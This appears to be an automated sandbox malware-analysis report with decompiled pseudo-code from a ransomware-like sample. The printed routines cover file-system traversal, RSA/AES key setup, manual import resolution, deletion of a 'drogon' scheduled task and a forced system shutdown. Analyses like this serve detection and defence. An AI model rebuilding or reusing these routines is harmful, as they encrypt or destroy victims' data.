GetVersion.KERNEL32(SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318},UpperFilters,SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F},LowerFilters,00000000,007B11D0,?,?,?), ref: 007B1588

Strings

cscc, xrefs: 007B1533
cscc, xrefs: 007B153A
DumpFilters, xrefs: 007B1592
SYSTEM\CurrentControlSet\Control\CrashControl, xrefs: 007B1597
SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}, xrefs: 007B1578
SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}, xrefs: 007B1563
LowerFilters, xrefs: 007B155E
UpperFilters, xrefs: 007B1573

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Version
String ID: DumpFilters$LowerFilters$SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}$SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}$SYSTEM\CurrentControlSet\Control\CrashControl$UpperFilters$cscc$cscc
API String ID: 1889659487-625840244
Opcode ID: 7b8b074b3478e662f0bea1f8c1edd8ec8a41ffff1060f6bcd810aa9911c2c521
Instruction ID: a2c6fcf42bedb5a0a8ecc9bb0efb087c507b18c8598a579506f36de69c7b51c9
Opcode Fuzzy Hash: 7b8b074b3478e662f0bea1f8c1edd8ec8a41ffff1060f6bcd810aa9911c2c521
Instruction Fuzzy Hash: 60F05472E91726970AB133A8A83AFD902815D51B643CA429CFC42B7141F64CCF1182E1

Uniqueness

Uniqueness Score: -1.00%

Function 007B6299 Relevance: 15.1, APIs: 10, Instructions: 81
encryptionsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E007B6299(void* __ecx, void* _a4) {
				void* __esi;
				void* _t12;
				char* _t13;
				void* _t16;
				void* _t19;
				void* _t22;
				void* _t26;
				int _t31;
				void* _t32;
				void* _t33;
				void* _t34;
				long** _t36;
				void* _t38;

				_t33 = __ecx;
				_t31 = 0;
				_t12 = CreateEventW(0, 1, 0, 0);
				_t38 = _a4;
				 *(_t38 + 0x48) = _t12;
				if(_t12 != 0) {
					_t36 = _t38 + 0x30;
					_t16 = E007B5507(_t36); // executed
					if(_t16 != 0) {
						_t19 = E007B5613( *_t36,  *((intOrPtr*)(_t38 + 0x34)), _t38 + 0x38); // executed
						if(_t19 != 0) {
							_t22 = E007B6085(_t38, _t33); // executed
							if(_t22 != 0) {
								if(E007B6246(_t33, _t38) != 0) {
									_t26 = CreateThread(0, 0, E007B60F9, _t38, 0, 0); // executed
									_t32 = _t26;
									E007B5E9F(_t38 + 4, 0x11, _t38); // executed
									if(_t32 != 0) {
										WaitForSingleObject(_t32, 0xffffffff);
										CloseHandle(_t32);
									}
									__imp__CryptDestroyHash( *((intOrPtr*)(_t38 + 0x40)));
									_t31 = 0;
								}
								CryptDestroyKey( *(_t38 + 0x3c));
							}
							CryptDestroyKey( *(_t38 + 0x38));
						}
						CryptReleaseContext( *_t36, _t31);
					}
					CloseHandle( *(_t38 + 0x48));
				}
				_t34 = 0x21;
				_t13 = _t38 + 0xc;
				do {
					 *_t13 = 0;
					_t13 = _t13 + 1;
					_t34 = _t34 - 1;
				} while (_t34 != 0);
				LocalFree(_t38);
				return 0;
			}

0x007b6299
0x007b629e
0x007b62a5
0x007b62ab
0x007b62ae
0x007b62b3
0x007b62ba
0x007b62be
0x007b62c5
0x007b62d0
0x007b62d7
0x007b62db
0x007b62e2
0x007b62eb
0x007b62f7
0x007b62fe
0x007b6306
0x007b630d
0x007b6312
0x007b6319
0x007b6319
0x007b6322
0x007b6328
0x007b6328
0x007b632d
0x007b632d
0x007b6336
0x007b6336
0x007b633f
0x007b633f
0x007b6348
0x007b634e
0x007b6351
0x007b6352
0x007b6355
0x007b6355
0x007b6358
0x007b6359
0x007b6359
0x007b635d
0x007b6368

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007B62A5
LocalFree.KERNEL32(?), ref: 007B635D

Part of subcall function 007B5507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,007B62C3,?), ref: 007B5520
Part of subcall function 007B5507: GetLastError.KERNEL32(?,007B62C3,?), ref: 007B5528
Part of subcall function 007B5507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,007B62C3,?), ref: 007B553E

CloseHandle.KERNEL32(?,?), ref: 007B6348

Part of subcall function 007B5613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007B5636
Part of subcall function 007B5613: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 007B564C
Part of subcall function 007B5613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007B5662
Part of subcall function 007B5613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 007B5682
Part of subcall function 007B5613: LocalAlloc.KERNEL32(00000040,?), ref: 007B568D
Part of subcall function 007B5613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 007B56A6
Part of subcall function 007B5613: CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 007B56B5
Part of subcall function 007B5613: LocalFree.KERNEL32(00000000), ref: 007B56BF
Part of subcall function 007B5613: LocalFree.KERNEL32(?), ref: 007B56C8

CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?), ref: 007B633F

Part of subcall function 007B6085: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,007B62E0,?,?,?,?), ref: 007B60A6
Part of subcall function 007B6085: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,007B62E0,?,?,?,?), ref: 007B60BA
Part of subcall function 007B6085: CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,007B62E0,?,?,?,?), ref: 007B60D3
Part of subcall function 007B6085: CryptDestroyHash.ADVAPI32(?,?,?,?,007B62E0,?,?,?,?), ref: 007B60DF

CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 007B6336

Part of subcall function 007B6246: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,007B62E9,?,?,?,?), ref: 007B6260
Part of subcall function 007B6246: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,007B62E9,?,?,?,?), ref: 007B6273
Part of subcall function 007B6246: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,007B62E9,?,?,?,?), ref: 007B6289

CreateThread.KERNELBASE ref: 007B62F7

Part of subcall function 007B5E9F: PathCombineW.SHLWAPI(?,?,007C1554,?,?), ref: 007B5EC8
Part of subcall function 007B5E9F: FindFirstFileW.KERNELBASE(?,?), ref: 007B5EE3
Part of subcall function 007B5E9F: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 007B5F09
Part of subcall function 007B5E9F: PathCombineW.SHLWAPI(?,?,?), ref: 007B5FB1
Part of subcall function 007B5E9F: StrStrIW.SHLWAPI(?,007C3014), ref: 007B5FE9

WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000011,?), ref: 007B6312
CloseHandle.KERNEL32(00000000), ref: 007B6319
CryptDestroyHash.ADVAPI32(?,?,00000011,?), ref: 007B6322
CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 007B632D

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Crypt$Hash$Local$CreateDestroy$ContextFreeObject$AcquireAllocBinaryCloseCombineDataDecodeHandlePathStringWait$DeriveErrorEventFileFindFirstImportInfoLastMultipleObjectsParamPublicReleaseSingleThread
String ID:
API String ID: 2692407486-0
Opcode ID: 2b531e9f1c1ec3c5dcb0fb60521632810f211ae8c3ddc9f4e3a7092ee06591e6
Instruction ID: 5d8b3e610f0801a77e50cf26e95e1280ebeb25f6ea165b327c8635504b45ce02
Opcode Fuzzy Hash: 2b531e9f1c1ec3c5dcb0fb60521632810f211ae8c3ddc9f4e3a7092ee06591e6
Instruction Fuzzy Hash: 09215E71100608AFE7216BA1ED88FEB7BADFF08351B044529FB4282461EB7DEC418B24

Uniqueness

Uniqueness Score: -1.00%

Function 007B5613 Relevance: 13.6, APIs: 9, Instructions: 87encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007B5636
LocalAlloc.KERNEL32(00000040,?,00000000), ref: 007B564C
CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 007B5662
CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 007B5682
LocalAlloc.KERNEL32(00000040,?), ref: 007B568D
CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 007B56A6
CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 007B56B5
LocalFree.KERNEL32(00000000), ref: 007B56BF
LocalFree.KERNEL32(?), ref: 007B56C8

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$ImportInfoPublic
String ID:
API String ID: 3940947887-0
Opcode ID: 7ccf3d7702bfa83516a16d3779525ecb1ed0d2d8f03e15dde7a2e1c7a2fc66cf
Instruction ID: 9ee601801677e41edf13dd66acf0e69a51c8c373dbd22770ef98086a246fb61c
Opcode Fuzzy Hash: 7ccf3d7702bfa83516a16d3779525ecb1ed0d2d8f03e15dde7a2e1c7a2fc66cf
Instruction Fuzzy Hash: 46212A7650121CBBDB219F968C45FEFBF7DEF09BA4F008011FA08A61A0D6759E11DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 007B5E9F Relevance: 12.2, APIs: 8, Instructions: 151
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E007B5E9F(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				short _v532;
				short _v1052;
				short _v1060;
				struct _WIN32_FIND_DATAW _v1644;
				void* _v1648;
				signed int _v1652;
				int _t44;
				long _t52;
				intOrPtr* _t53;
				int _t55;
				intOrPtr* _t56;
				WCHAR* _t61;
				void* _t62;
				WCHAR** _t69;
				intOrPtr* _t73;
				intOrPtr* _t74;
				intOrPtr* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t89;
				signed int _t90;
				signed int _t91;
				void* _t93;
				WCHAR* _t114;

				_t93 = (_t91 & 0xfffffff8) - 0x668;
				if(_a8 == 0) {
					L39:
					return _t44;
				}
				_t44 = PathCombineW( &_v524, _a4, "*");
				if(_t44 == 0) {
					goto L39;
				}
				_t44 = FindFirstFileW( &_v532,  &_v1644); // executed
				_v1648 = _t44;
				if(_t44 == 0xffffffff) {
					goto L39;
				} else {
					goto L3;
				}
				while(1) {
					L3:
					_t52 = WaitForMultipleObjects((0 |  *((intOrPtr*)(_a12 + 0x4c)) != 0x00000000) + 1, _a12 + 0x48, 0, 0);
					if(_t52 == 0 || _t52 == 1 || _t52 == 0xffffffff) {
						break;
					}
					_t73 = ".";
					_t53 =  &(_v1644.cFileName);
					while(1) {
						_t79 =  *_t53;
						if(_t79 !=  *_t73) {
							break;
						}
						if(_t79 == 0) {
							L11:
							_t53 = 0;
							L13:
							if(_t53 == 0) {
								L37:
								_t55 = FindNextFileW(_v1648,  &_v1644); // executed
								if(_t55 != 0) {
									goto L3;
								}
								goto L38;
							}
							_t74 = L"..";
							_t56 =  &(_v1644.cFileName);
							while(1) {
								_t80 =  *_t56;
								if(_t80 !=  *_t74) {
									break;
								}
								if(_t80 == 0) {
									L19:
									_t56 = 0;
									L21:
									if(_t56 != 0 && PathCombineW( &_v1052, _a4,  &(_v1644.cFileName)) != 0) {
										if((_v1652 & 0x00000010) == 0 || (_v1652 & 0x00000400) != 0) {
											_t61 = PathFindExtensionW( &(_v1644.dwReserved0));
											_t75 =  &(_v1644.dwReserved0);
											_t81 = _t75 + 2;
											do {
												_t89 =  *_t75;
												_t75 = _t75 + 2;
											} while (_t89 != 0);
											if(_t61 == _t93 + 0x3c + (_t75 - _t81 >> 1) * 2) {
												_t62 = 0;
											} else {
												_t62 = E007B59B1(_t61);
											}
											if(_t62 != 0) {
												E007B5D0A(_t81,  &_v1060, _a12); // executed
											}
										} else {
											_t90 = 0;
											_t114 =  *0x7c3014; // 0x7c1528
											if(_t114 == 0) {
												L29:
												E007B5E9F( &_v1060, _a8 - 1, _a12); // executed
												goto L37;
											}
											_t69 = 0x7c3014;
											while(StrStrIW( &_v1060,  *_t69) == 0) {
												_t90 = _t90 + 1;
												_t69 =  &(0x7c3014[_t90]);
												if( *_t69 != 0) {
													continue;
												}
												goto L29;
											}
										}
									}
									goto L37;
								}
								_t82 =  *((intOrPtr*)(_t56 + 2));
								_t17 = _t74 + 2; // 0x2e
								if(_t82 !=  *_t17) {
									break;
								}
								_t56 = _t56 + 4;
								_t74 = _t74 + 4;
								if(_t82 != 0) {
									continue;
								}
								goto L19;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L21;
						}
						_t83 =  *((intOrPtr*)(_t53 + 2));
						_t14 = _t73 + 2; // 0x650000
						if(_t83 !=  *_t14) {
							break;
						}
						_t53 = _t53 + 4;
						_t73 = _t73 + 4;
						if(_t83 != 0) {
							continue;
						}
						goto L11;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L13;
				}
				L38:
				_t44 = FindClose(_v1648); // executed
				goto L39;
			}

0x007b5ea5
0x007b5eb2
0x007b607d
0x007b6082
0x007b6082
0x007b5ec8
0x007b5ed0
0x00000000
0x00000000
0x007b5ee3
0x007b5ee9
0x007b5ef0
0x00000000
0x00000000
0x00000000
0x00000000
0x007b5ef6
0x007b5ef6
0x007b5f09
0x007b5f11
0x00000000
0x00000000
0x007b5f29
0x007b5f2e
0x007b5f32
0x007b5f32
0x007b5f38
0x00000000
0x00000000
0x007b5f3d
0x007b5f54
0x007b5f54
0x007b5f5d
0x007b5f5f
0x007b605c
0x007b6065
0x007b606d
0x00000000
0x00000000
0x00000000
0x007b606d
0x007b5f65
0x007b5f6a
0x007b5f6e
0x007b5f6e
0x007b5f74
0x00000000
0x00000000
0x007b5f79
0x007b5f90
0x007b5f90
0x007b5f99
0x007b5f9b
0x007b5fc4
0x007b601b
0x007b6021
0x007b6025
0x007b6028
0x007b6028
0x007b602b
0x007b602e
0x007b603d
0x007b6046
0x007b603f
0x007b603f
0x007b603f
0x007b604a
0x007b6057
0x007b6057
0x007b5fd0
0x007b5fd0
0x007b5fd2
0x007b5fd8
0x007b5fff
0x007b600f
0x00000000
0x007b600f
0x007b5fda
0x007b5fdf
0x007b5ff3
0x007b5ff4
0x007b5ffd
0x00000000
0x00000000
0x00000000
0x007b5ffd
0x007b5fdf
0x007b5fc4
0x00000000
0x007b5f9b
0x007b5f7b
0x007b5f7f
0x007b5f83
0x00000000
0x00000000
0x007b5f85
0x007b5f88
0x007b5f8e
0x00000000
0x00000000
0x00000000
0x007b5f8e
0x007b5f94
0x007b5f96
0x00000000
0x007b5f96
0x007b5f3f
0x007b5f43
0x007b5f47
0x00000000
0x00000000
0x007b5f49
0x007b5f4c
0x007b5f52
0x00000000
0x00000000
0x00000000
0x007b5f52
0x007b5f58
0x007b5f5a
0x00000000
0x007b5f5a
0x007b6073
0x007b6077
0x00000000

APIs

PathCombineW.SHLWAPI(?,?,007C1554,?,?), ref: 007B5EC8
FindFirstFileW.KERNELBASE(?,?), ref: 007B5EE3
WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 007B5F09
PathCombineW.SHLWAPI(?,?,?), ref: 007B5FB1
StrStrIW.SHLWAPI(?,007C3014), ref: 007B5FE9
PathFindExtensionW.SHLWAPI(?), ref: 007B601B
FindNextFileW.KERNELBASE(?,?), ref: 007B6065
FindClose.KERNELBASE(?), ref: 007B6077

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Find$Path$CombineFile$CloseExtensionFirstMultipleNextObjectsWait
String ID:
API String ID: 1251538951-0
Opcode ID: fcb8f0940adec1c777e0ecda110225f7b359abdb33b230b552cb673bb5eb68ae
Instruction ID: 2608aeb5886cab701b343835a4128f15769754885ece00840250795d5a9746da
Opcode Fuzzy Hash: fcb8f0940adec1c777e0ecda110225f7b359abdb33b230b552cb673bb5eb68ae
Instruction Fuzzy Hash: AE51AE311046469EDB31AF24CC48FFAB3AAEB94714F944A29F652C60A4F73ECA45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 007B8A23 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E007B8A23() {
				void* _t4;

				_t4 = E007B808E(); // executed
				if(( *0x7c7bc0 & 0x00000002) != 0) {
					_t4 = E007B7FB7(L"schtasks /Delete /F /TN drogon", 0); // executed
				}
				if(( *0x7c7bc0 & 0x00000001) != 0) {
					__imp__InitiateSystemShutdownExW(0, 0, 0, 1, 1, 0x80000000); // executed
					if(_t4 == 0) {
						ExitWindowsEx(6, 0); // executed
					}
				}
				ExitProcess(0);
			}

0x007b8a24
0x007b8a32
0x007b8a3a
0x007b8a3a
0x007b8a46
0x007b8a54
0x007b8a5c
0x007b8a61
0x007b8a61
0x007b8a5c
0x007b8a68

APIs

Part of subcall function 007B808E: wsprintfW.USER32 ref: 007B80BC
Part of subcall function 007B808E: wsprintfW.USER32 ref: 007B80CC
Part of subcall function 007B808E: wsprintfW.USER32 ref: 007B80DC
Part of subcall function 007B808E: wsprintfW.USER32 ref: 007B80EC
Part of subcall function 007B808E: wsprintfW.USER32 ref: 007B8126

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 007B8A54
ExitWindowsEx.USER32(00000006,00000000), ref: 007B8A61
ExitProcess.KERNEL32 ref: 007B8A68

Part of subcall function 007B7FB7: wsprintfW.USER32 ref: 007B7FD6
Part of subcall function 007B7FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 007B7FFA
Part of subcall function 007B7FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B800C
Part of subcall function 007B7FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 007B8022
Part of subcall function 007B7FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 007B8069
Part of subcall function 007B7FB7: Sleep.KERNELBASE(00000000), ref: 007B807F

Strings

schtasks /Delete /F /TN drogon, xrefs: 007B8A35

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: wsprintf$ExitProcessSystem$CreateDirectoryEnvironmentInitiateShutdownSleepVariableWindowslstrcat
String ID: schtasks /Delete /F /TN drogon
API String ID: 3579268615-951750757
Opcode ID: 40779f949c6f821a37efedbb6eec2266246e85991903bba576a9190627dacbd8
Instruction ID: 3913384c8d3f4fb9a9208464ee51be605fbb187f722ff680554c3a19d2a63093
Opcode Fuzzy Hash: 40779f949c6f821a37efedbb6eec2266246e85991903bba576a9190627dacbd8
Instruction Fuzzy Hash: 5AE04F20156260B5E27567215C0EFDB2E4DEF13794F04C208F944A00A59F9D4941C5BE

Uniqueness

Uniqueness Score: -1.00%

Function 007B9016 Relevance: 6.1, APIs: 4, Instructions: 109
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E007B9016() {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				void* _t48;
				int _t53;
				int _t57;
				struct HINSTANCE__* _t60;
				intOrPtr _t61;
				signed int _t62;
				signed int _t63;
				long _t66;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t73;
				intOrPtr _t75;
				signed int _t77;
				signed int* _t80;
				intOrPtr _t82;
				signed int* _t85;

				_t71 =  *0x7c7b98;
				_v8 = _v8 & 0x00000000;
				_t48 =  *((intOrPtr*)(_t71 + 0x3c)) + _t71;
				_t70 =  *((intOrPtr*)(_t48 + 0x80)) + _t71;
				if(_t70 != 0) {
					_v12 = _v12 & 0x00000000;
					_t77 =  *(_t48 + 6) & 0x0000ffff;
					_t82 = ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
					_v16 = _t82;
					if(_t77 > 0) {
						_t66 =  *((intOrPtr*)(_t48 + 0xd8));
						_v20 = _t66;
						do {
							_t75 =  *((intOrPtr*)(_t82 + 0xc));
							if(_t66 < _t75) {
								goto L5;
							} else {
								_v24 =  *(_t82 + 8) + _t75;
								_t66 = _v20;
								if(_t66 >= _v24) {
									goto L5;
								}
							}
							goto L6;
							L5:
							_v12 = _v12 + 1;
							_t82 = _t82 + 0x28;
							_v16 = _t82;
						} while (_v12 < _t77);
					}
					L6:
					_t53 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) + _t71,  *(_t82 + 8), 4,  &_v20); // executed
					if(_t53 != 0) {
						_v8 = 1;
						if( *_t70 == 0) {
							L22:
							_t57 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) +  *0x7c7b98,  *(_t82 + 8), _v20,  &_v20); // executed
							_v8 = _t57;
						} else {
							while(_v8 == 1) {
								_t60 = LoadLibraryA( *((intOrPtr*)(_t70 + 0xc)) +  *0x7c7b98); // executed
								_v12 = _t60;
								if(_t60 == 0) {
									_v8 = _v8 & 0x00000000;
								} else {
									_t61 =  *0x7c7b98;
									_t85 =  *((intOrPtr*)(_t70 + 0x10)) + _t61;
									_t80 =  *_t70 + _t61;
									while(1) {
										_t62 =  *_t80;
										if(_t62 == 0) {
											break;
										}
										if(_v8 == 1) {
											_t73 = _t62 & 0x7fffffff;
											if(_t73 != _t62) {
												_push(_t73);
											} else {
												_push( *0x7c7b98 + _t73 + 2);
											}
											_t63 = GetProcAddress(_v12, ??); // executed
											 *_t85 = _t63;
											if(_t63 == 0) {
												_v8 = _v8 & _t63;
											}
											_t85 =  &(_t85[1]);
											_t80 =  &(_t80[1]);
											continue;
										}
										break;
									}
									_t82 = _v16;
								}
								_t70 = _t70 + 0x14;
								if( *_t70 != 0) {
									continue;
								}
								break;
							}
							if(_v8 != 0) {
								goto L22;
							}
						}
					}
				}
				return _v8;
			}

0x007b901c
0x007b9025
0x007b9029
0x007b9032
0x007b9034
0x007b903e
0x007b9044
0x007b9048
0x007b904c
0x007b9051
0x007b9053
0x007b9059
0x007b905c
0x007b905c
0x007b9061
0x00000000
0x007b9063
0x007b9068
0x007b906b
0x007b9071
0x00000000
0x00000000
0x007b9071
0x00000000
0x007b9073
0x007b9073
0x007b9076
0x007b9079
0x007b907c
0x007b905c
0x007b9081
0x007b9090
0x007b9098
0x007b90a1
0x007b90a8
0x007b9129
0x007b913d
0x007b9143
0x007b90aa
0x007b90aa
0x007b90ba
0x007b90c0
0x007b90c5
0x007b914e
0x007b90cb
0x007b90cb
0x007b90d5
0x007b90d7
0x007b9112
0x007b9112
0x007b9116
0x00000000
0x00000000
0x007b90df
0x007b90e3
0x007b90eb
0x007b90f9
0x007b90ed
0x007b90f6
0x007b90f6
0x007b90fd
0x007b9103
0x007b9107
0x007b9109
0x007b9109
0x007b910c
0x007b910f
0x00000000
0x007b910f
0x00000000
0x007b90df
0x007b9118
0x007b9118
0x007b911b
0x007b9121
0x00000000
0x00000000
0x00000000
0x007b9121
0x007b9127
0x00000000
0x00000000
0x007b9127
0x007b90a8
0x007b9147
0x007b914d

APIs

VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 007B9090
LoadLibraryA.KERNELBASE(?), ref: 007B90BA
GetProcAddress.KERNELBASE(00000000,?), ref: 007B90FD
VirtualProtect.KERNELBASE(?,?,?,?), ref: 007B913D

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: d9d75481b38a9177fab0bb03519ec16a350522d8829a70f9f66a4d1b5ea79bd0
Instruction ID: f0979387edc56aff1e40c1c0389627e038123192257f2f95534b02287ab7098a
Opcode Fuzzy Hash: d9d75481b38a9177fab0bb03519ec16a350522d8829a70f9f66a4d1b5ea79bd0
Instruction Fuzzy Hash: A94148B190021AEFDF24CF99C888BA9B7F4FF04315F1584A9D625A7251E778EE80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 007B6085 Relevance: 6.0, APIs: 4, Instructions: 49encryptionCOMMON

Download Yara Rule

APIs

CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,007B62E0,?,?,?,?), ref: 007B60A6
CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,007B62E0,?,?,?,?), ref: 007B60BA
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,007B62E0,?,?,?,?), ref: 007B60D3
CryptDestroyHash.ADVAPI32(?,?,?,?,007B62E0,?,?,?,?), ref: 007B60DF

Part of subcall function 007B559B: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 007B55BC
Part of subcall function 007B559B: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 007B55CB
Part of subcall function 007B559B: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 007B55DA
Part of subcall function 007B559B: LocalAlloc.KERNEL32(00000040,?), ref: 007B55EE
Part of subcall function 007B559B: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 007B5601
Part of subcall function 007B559B: LocalFree.KERNEL32(?), ref: 007B5606

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
